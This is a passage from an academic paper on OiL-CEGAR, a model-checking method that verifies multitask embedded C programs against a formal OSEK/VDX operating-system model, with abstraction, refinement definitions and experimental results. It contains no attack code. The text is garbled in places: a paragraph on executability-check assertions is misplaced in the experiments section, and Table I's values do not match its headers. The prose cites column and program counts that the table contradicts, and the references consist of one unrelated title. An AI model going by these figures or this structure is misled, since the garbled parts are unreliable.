If the counterexample trace \( \tau \) has an unreachable transition in the actual application program, we use the same trace up to the first unreachable state, named \( \tau' \), to refine \( M_{os} || \tilde{M}_{app} \). D. Refinements using \( \tau' \) Once \( \tau' \) is identified, we refine \( M_{os} || \tilde{M}_{app} \) so that \( \tau' \) can be eliminated from its possible execution traces. To this end, we first construct a statemachine \( A(\tau') = (S, s_0, T, s_E) \), where \( S = \{ s \mid s \in \tau' \} \cup \{ s_U \} \) is the set of states in \( \tau' \) plus one additional special state \( s_U \) representing the universal state; \( s_0 \) is the initial state in \( \tau' \); \( s_E \) is the final state of \( \tau' \), representing the error state; and \( T = \tau' \cup \{ s \rightarrow s_U \mid s \neq s_E \} \cup \{ s_U \rightarrow s_U \} \cup \{ s_E \rightarrow s_E \} \) is the set of transitions in \( \tau' \) plus new transitions from each non-error state to the universal state plus self-transitions of \( s_U \) and \( s_E \). Figure 7 illustrates \( A(\tau') \) for our example for each iteration of OiL-CEGAR. \footnote{RUN, RDY, WIT, and SUS are abbreviations for Running, Ready, Waiting, and Suspended} \( M_{os}||\tilde{M}_{app} \) is refined by constructing \((M_{os}||\tilde{M}_{app}) \odot A(\tau')\), where \( \odot \) represents the trace composition of the two statemachines. The trace composition \( A \odot B \) allows transitions of \( A \) only when \( A \) and \( B \) share equivalent source/target states and satisfy both transition conditions, and when the target state is not the error state. For example, the trace composition of \((M_{os}||\tilde{M}_{app})\) shown in Figure 6 and \( A(\tau_1) \) in Figure 7 (a) results in removing the trace \( s_0s_1s_2s_4s_5s_6s_7s_{11} \) from \((M_{os}||\tilde{M}_{app})\).
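The construction of \( A(\tau') \) just described can be sketched directly, ignoring events and guards (which the formal definition in Section VI-C carries along):

```python
def refinement_base(trace):
    """Refinement base A(tau') sketch (events/guards omitted): keep the
    trace transitions, let every non-error state escape to a universal
    state s_U, and add self-loops on s_U and the final (error) state."""
    error = trace[-1]
    states = set(trace) | {"s_U"}
    R = set(zip(trace, trace[1:]))                  # the trace itself
    R |= {(s, "s_U") for s in trace if s != error}  # escape transitions
    R |= {("s_U", "s_U"), (error, error)}           # self-loops
    return states, trace[0], R, error

S, s0, R, sE = refinement_base(["s0", "s1", "s2"])
print(("s1", "s_U") in R, ("s2", "s_U") in R)  # True False
```

Because every non-error state can escape to \( s_U \), trace-composing a model with this machine prunes exactly the one path ending in the error state and leaves all other behaviors intact.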
The OiL-CEGAR process is repeated from the property checking of \((M_{os}||\tilde{M}_{app}) \odot A(\tau_1)\), producing refinement bases as shown in Figure 7 (b) and Figure 7 (c), and thus removing the traces \( s_0s_1s_2s_4s_5s_6s_7s_{11} \) and \( s_0s_1s_2s_4s_5s_6s_7s_{12} \) in order, before it concludes that the property is satisfied. \section*{V. ABSTRACTION} OiL-CEGAR starts by constructing an application model \( \tilde{M}_{app} \) as a synchronous parallel composition of statemachines, each representing a task in the application program. This section explains the two major abstractions applied to the source code of each task before the application model is composed with the operating system model. \subsection*{A. Pre-processing} Due to the limited expressive power of the input language of NuSMV compared to that of the implementation language C, we performed two types of pre-processing on the source code. First, user-defined functions were inlined, assuming that the program did not contain any infinitely recursive calls. Second, composite structures such as arrays and user-defined structures were flattened so that all variables were typed as primitives, assuming that there were no dynamic allocations and that all structures were thus of fixed size. These assumptions are valid for embedded systems in critical domains, as recommended by the MISRA-C international standard [30]. \subsection*{B. Control abstraction} Multitask programs have multiple threads of control that interleave with each other. This context switching may happen as low as at the instruction level, but it is infeasible as well as uninteresting to consider all possible context-switching behaviors in multitasking programs. In this work, we applied control abstraction to the CFG of each task based on the notion of partial-order reduction [31] by defining the statement block as a maximal sequence of statements to be executed without interrupts.
The statement block in Definition 3 is a unit of such a context switch, whose execution is independent of concurrently executed transitions of other tasks. The CFG of each task in the application source code was constructed using the statement block as the unit of execution. The rationale behind this was: (1) non-visible variables would not be affected by context switching, but visible variables may be, and (2) a call to an API function certainly causes an intervention of the operating system that may require context switching among tasks. In addition, we refined the statement block to separate statements with def-use relations into different blocks, due to the execution semantics of NuSMV, which executes all statements in a block at the same time. Figure 5 (a) shows the control-abstracted CFG of Figure 1. Blocks \( B^1_1 \) and \( B^1_2 \) in Figure 5 (a) are the abstraction of lines 01-02 and lines 05-06 of Figure 1, respectively. Line 07 is not blocked together with lines 05-06 because it is a visible statement and also references the variable local_var, which is defined in line 06. \subsection*{C. Data abstraction} A series of selective predicate abstractions was performed on the CFG of the pre-processed, control-abstracted application source code. These abstractions are a major source of non-executable counterexamples, but greatly help to reduce the complexity of property checking. 1) Abstraction of visible statements: Each visible statement is replaced by an empty statement with a unique symbol. 2) Abstraction of platform-dependent functions: Platform-dependent, user-defined library functions are replaced with stubs that return arbitrary values of the same return type. This abstraction is performed manually, once for each OS platform.
3) Abstraction of branch conditions: If a branch condition references a visible variable, the condition is replaced with a Boolean variable whose value can be nondeterministically assigned during property checking. 4) Numeric data abstraction: Statements involving floating-point variables are replaced with empty statements. This is due to a limitation of the model checker NuSMV, which cannot handle floating-point arithmetic. Compared to typical predicate abstraction [17], the suggested data abstraction is selective, as it is not applied to local variables of fixed size. This avoids unnecessary over-approximation, as embedded software frequently uses fixed-size variables due to stringent memory constraints. Figure 5 (b) shows the data-abstracted CFG. The first statement of \( B^1_1, B^1_2 \), the statement of \( B^2_1, B^2_3, B^2_2, \) and \( B^3_2 \) are replaced with empty statements because they reference either the pointer variable rho or the global variable wait_sw. The second statement of \( B^1_1 \) and the second statement of \( B^1_2 \) are not abstracted because local_var is a local integer variable that does not have any dependency on any visible variables. VI. MODEL CONSTRUCTION AND IMPLEMENTATION OiL-CEGAR requires the construction of three types of models: the task model constructed from each task CFG after a series of abstractions; the composition of the application model and the OS model; and a mini-OS constructed from a counterexample trace generated from property checking. This section explains the construction of a task model and a mini-OS in more detail. A. Task model construction The abstracted CFG for each task is converted into a statemachine $A_t = (S^t, S^t_0, R^t)$ by mapping the set of statement blocks and the set of control flow edges in the CFG to a set of states $S^t$ and a set of transitions $R^t$, respectively.
An additional transition from the final block to the entry block is added to allow the same task to be activated multiple times, removing the final state from the machine. Each transition in the statemachine is guarded by internal_state[$t$] = running to enable the transition only when the task is in the running state. Note that the information about the internal state of each task is maintained by the OS model. Figure 5 (c) illustrates the task models converted from Figure 5 (b), where the common guarding condition internal_state[$t$] = running is omitted from each transition to save space. The application model $\widehat{M}_{app} = A_{t_1} || A_{t_2} || \ldots || A_{t_n}$ is a synchronous parallel composition of task statemachines. Given the number of tasks $n$ in an application program, the parallel composition of an OS model and an application program includes $n$ statemachines representing the tasks internally maintained by the OS and $n$ statemachines, each representing the application logic of a task, synchronized over the set of API function calls and the internal states of the tasks, i.e., $$M_{os} \,||\, \widehat{M}_{app} = \widehat{M} \,||\, (M_{t_1} || \ldots || M_{t_n}) \,||\, (A_{t_1} || \ldots || A_{t_n})$$ where $\widehat{M}$ is a parallel composition of kernel objects other than tasks, such as events, resources, alarms, or schedulers. We use $\langle M_{os} \,||\, \widehat{M}_{app} \rangle_T = (M_{t_1} || \ldots || M_{t_n}) \,||\, (A_{t_1} || \ldots || A_{t_n})$ to represent the projection of $M_{os} \,||\, \widehat{M}_{app}$ onto the task statemachines of the system, as only the task part of the model is of interest in the refinement process of OiL-CEGAR. B. Mini-OS construction Given a property $\varphi$, the property checking $M_{os} \,||\, \widehat{M}_{app} \models \varphi$ generates a counterexample if $\varphi$ is not satisfied by $M_{os} \,||\, \widehat{M}_{app}$.
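The task-model conversion of Section VI-A can be sketched as follows. The guard is kept as an uninterpreted string, and the block and task names are illustrative, not taken from the paper's examples.

```python
def cfg_to_statemachine(task, blocks, edges, entry, exit_block):
    """Task model construction sketch (Section VI-A): CFG blocks become
    states, CFG edges become transitions guarded on the task being in the
    running state, and a back edge from exit to entry allows the task to
    be activated again after termination."""
    guard = f"internal_state[{task}] = running"
    R = {(src, guard, dst) for (src, dst) in edges}
    R.add((exit_block, guard, entry))   # re-activation back edge
    return set(blocks), {entry}, R

S, S0, R = cfg_to_statemachine("t1", ["B1", "B2", "B3"],
                               [("B1", "B2"), ("B2", "B3")], "B1", "B3")
print(("B3", "internal_state[t1] = running", "B1") in R)  # True
```

In the actual tool the resulting machine is emitted in the NuSMV input language and composed with the OS-side task statemachines, which own the internal_state variables referenced by the guards.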
When $\langle M_{os} \,||\, \widehat{M}_{app} \rangle_T$ is a composition of $n$ OS task statemachines and $n$ application task statemachines, the counterexample trace $\tau$ projected onto $\langle M_{os} \,||\, \widehat{M}_{app} \rangle_T$ is a sequence of composite states with $2n$ elements. The counterexample trace could be an infinite sequence, but we consider only a finite subsequence of it. Definition 7. A counterexample trace $\tau|_{T} = s_0s_1s_2\ldots s_m$ is a sequence of states with length $m+1$. Each state $s_i$ is a composite state of $2n$ elements $\langle o_1^i, o_2^i, \ldots, o_n^i, t_1^i, t_2^i, \ldots, t_n^i \rangle$, where $n$ is the number of tasks in the application program. Model checking may generate an infinite counterexample trace in case it ends with a cycle. In such a case, $\tau|_{T}$ is the maximal subsequence of the counterexample trace after removing the final cycle. For simplicity of notation, we will use $\tau$ and $\tau|_{T}$ interchangeably in the remaining discussions. We will also use $s_{i|os}$ and $s_{i|app}$ to represent the OS part and the application part of the composite state $s_i$ in $\tau|_{T}$, respectively. The counterexample trace includes information on task execution sequences, i.e., $\tau|_{os} = s_{0|os}s_{1|os}\ldots s_{m|os}$, which can act as a mini-OS that drives the executability checking of $\tau|_{app}$ in the application program code. Definition 8. A mini-OS $\widetilde{M}_{os}(\tau) = (S^\tau, S^\tau_0, R^\tau, s^\tau_f)$ is a statemachine constructed from a counterexample trace $\tau = s_0s_1s_2\ldots s_m$, where $S^\tau = \{ s_{i|os} \mid s_i \in \tau \}$, $S^\tau_0 = \{ s_{0|os} \}$, $R^\tau = \{ s_{i|os} \rightarrow s_{i+1|os} \mid i = 0 \ldots m - 1 \}$, and the final state $s^\tau_f = s_{m|os}$. The mini-OS is just a sequence of finite state transitions where each state indicates the internal states of the tasks.
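Definition 8 amounts to projecting each composite state onto its OS half and chaining the projections linearly. A sketch, with states as tuples whose first $n$ components are assumed to be the OS part:

```python
def mini_os(trace, n):
    """Mini-OS construction sketch (Definition 8): project each composite
    state s_i of the counterexample onto s_i|os (its first n components)
    and connect the projections in sequence."""
    os_states = [s[:n] for s in trace]            # s_i|os
    R = list(zip(os_states, os_states[1:]))       # s_i|os -> s_{i+1}|os
    return os_states, os_states[0], R, os_states[-1]

# two tasks: composite state = (OS state of t1, OS state of t2, block of
# t1, block of t2); the OS-state abbreviations follow Figure 7's legend
trace = [("RUN", "SUS", 1, 0), ("RDY", "RUN", 1, 1), ("RUN", "WIT", 2, 1)]
S, s0, R, sf = mini_os(trace, 2)
print(s0, sf)  # ('RUN', 'SUS') ('RUN', 'WIT')
```

Because the result is a straight-line machine, replaying it as a test driver fixes the scheduling decisions completely, which is what makes the executability check on the concrete code tractable.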
Using this mini-OS as a test driver, we checked whether the application program is executable until the mini-OS reaches its final state under the following execution semantics of the application program: $$E_{exec}(i): (B_{t_1}, \ldots, B_{t_k}, \ldots, B_{t_n}) \rightarrow (B_{t_1}, \ldots, B'_{t_k}, \ldots, B_{t_n}) \quad \text{if } s_{i|os} \text{ schedules task } t_k \text{ to run and } B_{t_k} \rightarrow B'_{t_k} \in R^{t_k},$$ where $(B_{t_1}, \ldots, B_{t_n})$ is the tuple of current statement blocks of the $n$ tasks. When the application program consists of $n$ tasks, the $i$-th execution block is a statement block that belongs to the task assigned to run by the $i$-th state of the mini-OS. With this execution semantics, we applied CBMC model checking to the application program to check whether it finishes all $m+1$ executions as indicated in the mini-OS. If so, the counterexample $\tau$ is an executable counterexample, i.e., a true alarm. Otherwise, we can identify the first non-executable transition $s_{k|os} \rightarrow s_{k+1|os}$, where $s_{j|os} \rightarrow s_{j+1|os}$ is executable for all $0 \leq j < k$. We used the sequence of states from $s_0$ to $s_{k+1}$, named $\tau'$, to refine $M_{os} \,||\, \widehat{M}_{app}$. C. Refinement model construction $\tau'$ is an execution trace in $M_{os} \,||\, \widehat{M}_{app}$ that leads to the first non-executable transition in $M_{app}$. The goal of refinement is to remove such non-executable execution traces from the model until a counterexample trace executable in the application program is found or until no more counterexample traces exist. We first construct a statemachine $A(\tau')$ that includes all states and transitions in $\tau'$ plus an additional state $s_U$ representing the universal state and transitions from each non-error state to $s_U$. (NuSMV provides a counterexample trace indicating the start of a cycle, if there is any.) Definition 9.
A refinement base \( A(\tau') = (S^{\tau'}, s_0, R^{\tau'}, s_E) \) is a statemachine constructed from a non-executable counterexample trace \( \tau' = s_0 s_1 s_2 \ldots s_k s_{k+1} \), where - \( S^{\tau'} = \{ s_i \mid s_i \in \tau' \} \cup \{ s_U \} \); - the initial state is \( s_0 \); - the error state is \( s_E = s_{k+1} \); - \( R^{\tau'} = \{ s_i \xrightarrow{e[g]} s_{i+1} \mid i = 0 \ldots k \} \cup \{ s_i \xrightarrow{e'[g']} s_U \mid i \leq k, (e' \neq e \land g' = true) \lor g = \neg g' \} \cup \{ s_U \rightarrow s_U, s_{k+1} \rightarrow s_{k+1} \} \). We trace-composed the refinement base, as defined in Definition 6, with the verification model using the labeling function \( L \). Here, \( L \) is defined over \( S \cup S^{\tau'} \) as \( L(s) = L(s') \) iff \( s = s' \), \( s = s_U \), or \( s' = s_U \). Since there is a transition from any non-error state to \( s_U \) in \( A(\tau') \) and \( s_U \) has the same label as any other state, \( M \odot A(\tau') \) allows all transitions in \( M \) except for the sequence of transitions from the initial state to the error state in \( \tau' \). D. Implementation The prototype tool we used to implement OiL-CEGAR consisted of three components for model generation, executability checking, and refinement. Figure 8 illustrates the overall process of the prototype tool, where the implementation for representing statemachine models in NuSMV follows the approach described in [32]. The formal OS model used in our tool is from the automotive domain and is based on the OSEK/VDX international standard for automotive OSs [23]. We evaluated OiL-CEGAR using the following three test sets: TS1. A set of application programs running on Lego Mindstorms NXT [33], TS2. A set of test programs from a commercial conformance test suite used for certifying implementations of OSEK/VDX-based OSs [34], and TS3. A window controller program from the automotive domain [35]. We chose the programs in TS1 for the sake of fair comparison because they are open to the public, even though they are quite small in scale.
TS2 is a more realistic test set as it comes from domain experts, but it is not open to the public. The experiments with TS3 were done to check the feasibility of applying OiL-CEGAR to a program with high complexity. All experiments were performed on a Fedora Linux-based machine with a 3.4-GHz Intel Xeon E5-1680 CPU and 128 GB of memory. We used CBMC version 5.10 for executability checking, and NuSMV version 2.6.0 with dynamic variable reordering and cone-of-influence reduction. These options were used to accelerate the verification performance. A. Effectiveness of OiL-CEGAR The first experiment was aimed at evaluating the effectiveness of OiL-CEGAR using TS1 and TS2. TS1 contained eight programs with sizes varying from 35 to 87 lines of code and two to three tasks in each application. TS2 contained 14 test programs with 172 to 571 lines of code and five to seven tasks each. During executability checking, an assume statement prunes out program paths that do not respect its condition \( c \) during CBMC model checking. This is used to check only those execution paths that follow \( \tau_{|app} \) and to ignore all other execution sequences of statement blocks. Each block ends with saving the label of the next statement block to be executed in \( pc \) and returning control to \( main \). If the task sequence is executable, CBMC is supposed to find verification failures for all assertions specified in \( main \). Otherwise, we can identify the first assertion that did not fail, meaning that the task (and its corresponding statement block) called before the assertion checking is non-executable. In the second experiment, we applied two representative C code model checking tools (CBMC [1] and Yogar-CBMC [4]) to TS1 and TS2 to compare the verification accuracy of OiL-CEGAR to that of the best-known existing verification approaches for multitask programs. CBMC is the most stable and widely used C code model checker for the verification of multi-threaded programs under arbitrary interleavings among threads.
Yogar-CBMC implements CEGAR in CBMC and is the 2017, 2018, and 2019 winner of the SV-COMP competition in the verification of concurrent programs. We successively increased the loop bound from 2 to 21 when applying CBMC, until it either found a counterexample or verified the property without violating the unwinding assertion. Yogar-CBMC automatically sets the loop bound during the CEGAR process. We used a time bound of one hour for both cases. Columns nine to fourteen of Table I show the verification results. To the right of column nine, the columns show the verification time, the number of loop unwindings, the verification result of CBMC, and the verification result of Yogar-CBMC, respectively. CBMC and Yogar-CBMC were unable to find any executable counterexample trace for any of the six programs supposed to violate the property. Yogar-CBMC was able to verify two out of sixteen programs correctly, but CBMC was not able to verify any of them. Even though they identified counterexamples relatively quickly, they were all false alarms caused by infeasible context switches (WCS), by allowing two instances of a task to run at the same time (WT), or by allowing a task with lower priority to run prior to a task with higher priority (WP); in the remaining cases the tools exceeded the time bound of one hour (TO). These programs were verified with the same property P1, “A call to WaitEvent shall be followed by a matching call to SetEvent”. ### Table I <table> <thead> <tr> <th>App</th> <th>#T</th> <th>LoC</th> <th>B(NB)</th> <th>Verification</th> <th>Exec. chk.</th> <th>Result</th> <th>Verif. w/o OS - CBMC</th> <th>Verif.
w/o OS - YOGAR-CBMC</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> <td></td> <td>Time(s)</td> <td>Time(s)</td> <td>#R</td> <td>Time(s)</td> <td>#U</td> </tr> <tr> <td>bimaster</td> <td>3</td> <td>87</td> <td>5(1)</td> <td>5.415</td> <td>-</td> <td>0.62</td> <td>violated</td> <td>0.38</td> </tr> <tr> <td>btslave</td> <td>3</td> <td>86</td> <td>5(1)</td> <td>5.330</td> <td>-</td> <td>0.61</td> <td>violated</td> <td>0.37</td> </tr> <tr> <td>cubbyhole</td> <td>3</td> <td>37</td> <td>2(0)</td> <td>0.616</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>1.59</td> </tr> <tr> <td>eds</td> <td>3</td> <td>60</td> <td>4(0)</td> <td>0.626</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>0.44</td> </tr> <tr> <td>eventest</td> <td>3</td> <td>35</td> <td>6(4)</td> <td>0.238</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>614.05</td> </tr> <tr> <td>message</td> <td>3</td> <td>68</td> <td>5(2)</td> <td>4.076</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>0.39</td> </tr> <tr> <td>resourcetest</td> <td>2</td> <td>54</td> <td>9(0)</td> <td>0.475</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>-</td> </tr> <tr> <td>tttest</td> <td>2</td> <td>48</td> <td>6(4)</td> <td>1.133</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>-</td> </tr> <tr> <td>conf0_1</td> <td>6</td> <td>172</td> <td>4(2)</td> <td>40</td> <td>0</td> <td>0.131</td> <td>violated</td> <td>0.47</td> </tr> <tr> <td>conf0_2</td> <td>5</td> <td>329</td> <td>9(0)</td> <td>735</td> <td>4</td> <td>0.145</td> <td>satisfied</td> <td>2.41</td> </tr> <tr> <td>conf0_3</td> <td>6</td> <td>409</td> <td>9(0)</td> <td>498</td> <td>1</td> <td>0.350</td> <td>satisfied</td> <td>2.69</td> </tr> <tr> <td>conf0_4</td> <td>5</td> <td>419</td> <td>6(0)</td> <td>360</td> <td>3</td> <td>0.158</td> <td>violated</td> <td>1.05</td> </tr> <tr> <td>conf0_5</td> <td>5</td> <td>419</td> <td>13(0)</td> <td>2166</td> <td>3</td> <td>0.224</td> <td>satisfied</td> <td>0.94</td> </tr> <tr> <td>conf0_6</td> <td>5</td> <td>305</td> 
<td>17(0)</td> <td>638</td> <td>3</td> <td>0.168</td> <td>satisfied</td> <td>51.29</td> </tr> <tr> <td>conf0_7</td> <td>6</td> <td>505</td> <td>12(0)</td> <td>205</td> <td>1</td> <td>0.173</td> <td>satisfied</td> <td>1.02</td> </tr> <tr> <td>conf0_8</td> <td>6</td> <td>317</td> <td>17(0)</td> <td>613</td> <td>3</td> <td>0.216</td> <td>satisfied</td> <td>58.41</td> </tr> <tr> <td>conf0_9</td> <td>5</td> <td>362</td> <td>11(0)</td> <td>1521</td> <td>3</td> <td>0.153</td> <td>satisfied</td> <td>72.53</td> </tr> <tr> <td>conf0_10</td> <td>7</td> <td>346</td> <td>15(0)</td> <td>2904</td> <td>3</td> <td>0.277</td> <td>satisfied</td> <td>2.65</td> </tr> <tr> <td>conf0_11</td> <td>6</td> <td>571</td> <td>21(0)</td> <td>280</td> <td>1</td> <td>0.118</td> <td>violated</td> <td>74.25</td> </tr> <tr> <td>conf0_12</td> <td>6</td> <td>276</td> <td>5(0)</td> <td>157</td> <td>0</td> <td>0.211</td> <td>violated</td> <td>0.35</td> </tr> <tr> <td>conf0_13</td> <td>6</td> <td>310</td> <td>12(0)</td> <td>169</td> <td>1</td> <td>0.229</td> <td>satisfied</td> <td>0.58</td> </tr> <tr> <td>conf0_14</td> <td>6</td> <td>308</td> <td>11(0)</td> <td>167</td> <td>1</td> <td>0.236</td> <td>satisfied</td> <td>0.88</td> </tr> </tbody> </table>

We manually analyzed all 22 programs to ensure that our verification results using OiL-CEGAR are accurate. Note that multiple activations of the same task are possible, but only one of the activated tasks should run if priority-based FIFO scheduling is used. As CBMC and Yogar-CBMC do not take this situation into account, false alarms such as WT may occur. The programs eventest, resourcetest, and tttest are costly to verify, taking far more time for counterexample generation or going over the time limit. This is because they contain a nested loop or a large number of iterations, e.g., five million iterations in one example.

C. Scalability to complex systems with alarms and ISRs

The last experiment aimed to check how expensive it is to apply OiL-CEGAR to an application program with multiple alarms and interrupt service routines (ISRs). Alarms periodically fire requests to OS services. ISRs handle interrupts, which may occur at any time. They usually have higher priority than tasks, preempting the running task at arbitrary times. This is a major source of complexity in the verification of multitasking programs. The automotive window controller program in TS3 comprises 980 lines of code, consisting of five tasks, five alarms, and one ISR. The controller has eight system states: close, lock, locked, open, down, stall, up, and reverse. OiL-CEGAR was applied to this program w.r.t. property P2: P2. (For each system state) The system state is not reachable from the initial state. Table II shows the verification results. OiL-CEGAR successfully identified counterexamples for all eight states, showing that all states were reachable after 0 to 17 refinement iterations. The length of the generated counterexamples ranged from 14 to 23. The cost for the verification was quite high. For example, checking reverse took over 26 hours for 17 iterations of property checking and over 3.5 hours for executability checking using CBMC. However, the verification result was 100% accurate.

D. Threats to validity

OiL-CEGAR guarantees that property violations are found when a sound OS model is used, but does not guarantee that all false alarms will be identified, unless the model is also complete. The use of a sound OS model, a common requirement for most formal model-based approaches, is a necessary prerequisite for OiL-CEGAR, as it may otherwise fail to identify real alarms in the first place. Available formal OS models [5]–[8] are sound, but might not be complete w.r.t. time-dependent behaviors due to the use of relative timing.
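The WT and WP false-alarm classes discussed above arise from schedules that a priority-based FIFO scheduler would never produce. As an illustration (this is not the paper's actual trace encoding; the event format and priority table are assumptions), a counterexample trace can be checked against the scheduling policy as follows:

```python
# Hypothetical trace checker illustrating why WT/WP counterexamples are
# spurious under priority-based FIFO scheduling.

def valid_schedule(events, priority):
    """Return (True, None) if the trace respects priority-based FIFO
    scheduling, else (False, reason). Events are ("activate", task) or
    ("run", task); `priority` maps task name -> static priority."""
    ready = []  # activated tasks, in FIFO order of activation
    for kind, task in events:
        if kind == "activate":
            if task in ready:
                # a second concurrent instance of the same task (WT)
                return False, f"WT: {task} activated twice"
            ready.append(task)
        elif kind == "run":
            if task not in ready:
                return False, f"{task} ran without being activated"
            # highest priority wins; FIFO breaks ties among equal priorities
            best = max(ready, key=lambda t: (priority[t], -ready.index(t)))
            if best != task:
                # a lower-priority task ran before a higher-priority one (WP)
                return False, f"WP: {task} ran before {best}"
            ready.remove(task)
    return True, None
```

A counterexample reported by a checker that ignores the scheduler can be replayed through such a filter; any trace rejected with a WT or WP reason is a false alarm of the kind tabulated above.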
Our experiments showed 100% verification accuracy because the properties were not time-dependent. The pre-processing applied to the application source code, such as the flattening of data structures and the use of fixed-size primitive data types, assumes that the program does not contain any data structure with undefined size, as recommended by the MISRA-C standard. If this assumption is not fulfilled, the pre-processing might not be sound and is better replaced by data abstraction [36] or predicate abstraction [17], which guarantee soundness. We also limited the value ranges of the fixed-size variables in the model because NuSMV is not good at dealing with variables over a large range. This data abstraction should be performed with care, e.g., by using value analysis [37], in order not to undermine the soundness of the model. Though our experiments showed a great improvement in verification accuracy, OiL-CEGAR might not be able to identify non-executable counterexample traces, as we considered only finite subtraces of possibly infinite traces. Similar to existing CEGAR approaches, OiL-CEGAR might not terminate as it might refine the model infinitely, e.g., when a task contains an infinite loop. Our experiments were limited to API call constraint checking and reachability checking. However, OiL-CEGAR can also be used for general property checking with minor changes in task annotation, as NuSMV is capable of checking LTL and CTL properties and CBMC is used only for a bounded search of the counterexample trace.

VIII. RELATED WORK

Numerous approaches for verifying embedded control software exist, which can be divided into three categories: (1) verification of application programs with a highly abstracted scheduling policy [1]–[4], [38]; (2) verification approaches for OS [5]–[8] that focus on the correctness of either OS models or implementations; and (3) a number of recent works on the verification of embedded programs with verified OS models [25], [32], [39]–[41].

A. Verification with a highly abstracted scheduling policy

This approach has been the mainstream in research and practice for model checking multitasking programs. The approaches in [1]–[4], [38] assume arbitrary interleavings among tasks, but reduce verification complexity by either using partial order reduction or limiting the number of context switches among tasks. Lazy-CSeq [3], [42] further improves verification performance by predicting the range of values of numeric-typed variables [43]. References [4], [44] apply CEGAR under the assumption of arbitrary interleavings among tasks. Notably, reference [4] found that most of the CNF formulas generated by CBMC are related to the scheduling constraint that checks sequential consistency [45] of shared variables, and applied CEGAR on the scheduling constraint to achieve better performance. These approaches suffer from a high rate of false alarms by allowing arbitrary sequences of task executions, as demonstrated through our experiments.

B. Verification of application software with OS

There are approaches that use verified OS models to reason about application programs. References [22], [32], [40], [46] verified embedded programs with a formal OS model using Spin [28] or NuSMV by translating the application program into the modeling language used to model the operating system.
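The context-bounding reduction mentioned for category (1) can be sketched with a toy enumerator (illustrative only; real tools such as Lazy-CSeq operate on sequentialized C programs, not statement lists):

```python
def interleavings(tasks, bound):
    """Enumerate interleavings of per-task statement lists, pruning any
    schedule with more than `bound` context switches. Each task is a list
    of opaque statement labels; a context switch is counted whenever the
    scheduled task differs from the previously scheduled one."""
    results = []

    def step(pcs, last, switches, trace):
        if all(pcs[i] == len(tasks[i]) for i in range(len(tasks))):
            results.append(tuple(trace))
            return
        for i, prog in enumerate(tasks):
            if pcs[i] == len(prog):
                continue  # task i has finished
            s = switches + (0 if last in (None, i) else 1)
            if s > bound:
                continue  # prune: too many context switches
            pcs[i] += 1
            trace.append(prog[pcs[i] - 1])
            step(pcs, i, s, trace)
            trace.pop()
            pcs[i] -= 1

    step([0] * len(tasks), None, 0, [])
    return results
```

Raising the bound admits more interleavings (and catches more bugs) at exponential cost, which is exactly the trade-off these code-level tools navigate.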
Due to the difference in expressiveness between the implementation language and the modeling language, it is unavoidable that these approaches introduce abstractions into the translation process, which can be a source of false alarms. A faithful translation, on the other hand, would be expected to result in high verification cost. These issues are not treated in the existing approaches. Reference [25] is unique in that the application program is implicitly converted into rewrite logic within the K-framework, which is equipped with language interpreters for C, Java, and JavaScript. However, it suffers from high verification cost due to the use of a faithful interpretation of the program code as well as the formal OS model.

C. Refinement methods

Techniques for improving the efficiency of model refinements have been an active research issue [4], [13]–[16]. Studies [4], [13], [14] refine the CNF formula using the SAT core [47], which is a subset of the formula that is sufficient for establishing inconsistency with a counterexample. In trace abstraction refinement [15], [16], the program is abstracted so that arbitrary execution of statements is possible, and non-executable counterexamples are iteratively excluded from the model by checking the post-condition of each statement. The refinement in OiL-CEGAR is conceptually similar to trace abstraction refinement, but differs in that it uses the scheduling information of the counterexample and the model checker CBMC to identify non-executable counterexamples.

A. Why model-based?

One might argue that code-based verification is more practical and efficient, as model-based approaches require extra work, whereas C code model checking can be applied directly to C source code. This is not true if we have to take the OS behavior into account, because the OS implementation typically involves platform-dependent libraries and direct access to hardware. Abstraction and modeling are therefore necessary.
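The refinement loop described above can be sketched abstractly. The function names are stand-ins, not the paper's implementation: `check_model` plays the role of the model checker (NuSMV in OiL-CEGAR), `is_executable` the role of the CBMC-based executability check, and `refine` excludes a spurious trace from the model:

```python
def cegar(check_model, is_executable, refine, model, max_iters=100):
    """Generic counterexample-guided refinement skeleton in the style of
    trace refinement: model check; if a counterexample is found but is not
    executable, refine the model to exclude it and try again.
    `check_model` returns None (property holds) or a counterexample trace."""
    for i in range(max_iters):
        cex = check_model(model)
        if cex is None:
            return ("verified", i)       # no counterexample remains
        if is_executable(cex):
            return ("violated", cex)     # a real, executable violation
        model = refine(model, cex)       # exclude the spurious trace
    return ("unknown", max_iters)
```

As noted earlier, such a loop may fail to terminate when every refinement step exposes yet another spurious trace, which is why the bound on iterations matters in practice.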
We can perform abstractions at the code level or translate the OS model into the C language and perform code-level model checking. If we do this, however, we lose all the powerful support of the modeling language, such as implicit support for concurrency, atomicity, and the blocking and restarting of a process. These constructs are essential for an OS and must be explicitly modeled in C, resulting in higher complexity in verification. In addition, model-based verification performs property checking over infinite traces, while code-based verification is typically limited to finite traces. In fact, we did try code-level model checking using CBMC and Yogar-CBMC on the same set of programs used in the experiments, by converting the OS model into the C language. Though code-level model checking was faster than OiL-CEGAR on small-scale programs such as TS1 and TS2, neither CBMC nor Yogar-CBMC was able to find any reachable state on TS3 within 26 hours, the longest OiL-CEGAR took to find a reachable control state. CBMC was able to determine that the lock state was reachable within 20 minutes only after we manually removed four tasks from Winlift and limited the number of alarm occurrences to five.

B. Trace refinement vs. predicate refinement

OiL-CEGAR uses trace refinement after identifying false alarms, instead of the typical predicate refinement used in SLAM or BLAST [17], because it is simpler to apply to NuSMV models using constraints and invariants. The two approaches are orthogonal to each other, one refining predicates considering all execution paths and the other pruning infeasible traces considering all possible values of the predicate for a given trace.

C. Scalability

The use of a formal OS model in the refinement loop increases both verification accuracy and verification cost.
The cost for checking complex embedded software with multiple alarms and ISRs is still very high, but, to the best of our knowledge, this is the first experiment showing high verification accuracy in this domain under such complexity. Improving the scalability of OiL-CEGAR is our next research goal.

ACKNOWLEDGMENTS

This research has been supported by the Basic Science Research Program through the National Research Foundation of Korea (NRF), funded by the Ministry of Education (NRF-2016R1D1A3B01011685), and by the Next-Generation Information Computing Development Program through the National Research Foundation of Korea (NRF), funded by the Ministry of Science and ICT (No. 2017M3C4A7068175).

REFERENCES
An enterprise modeling and integration framework based on knowledge discovery and data mining

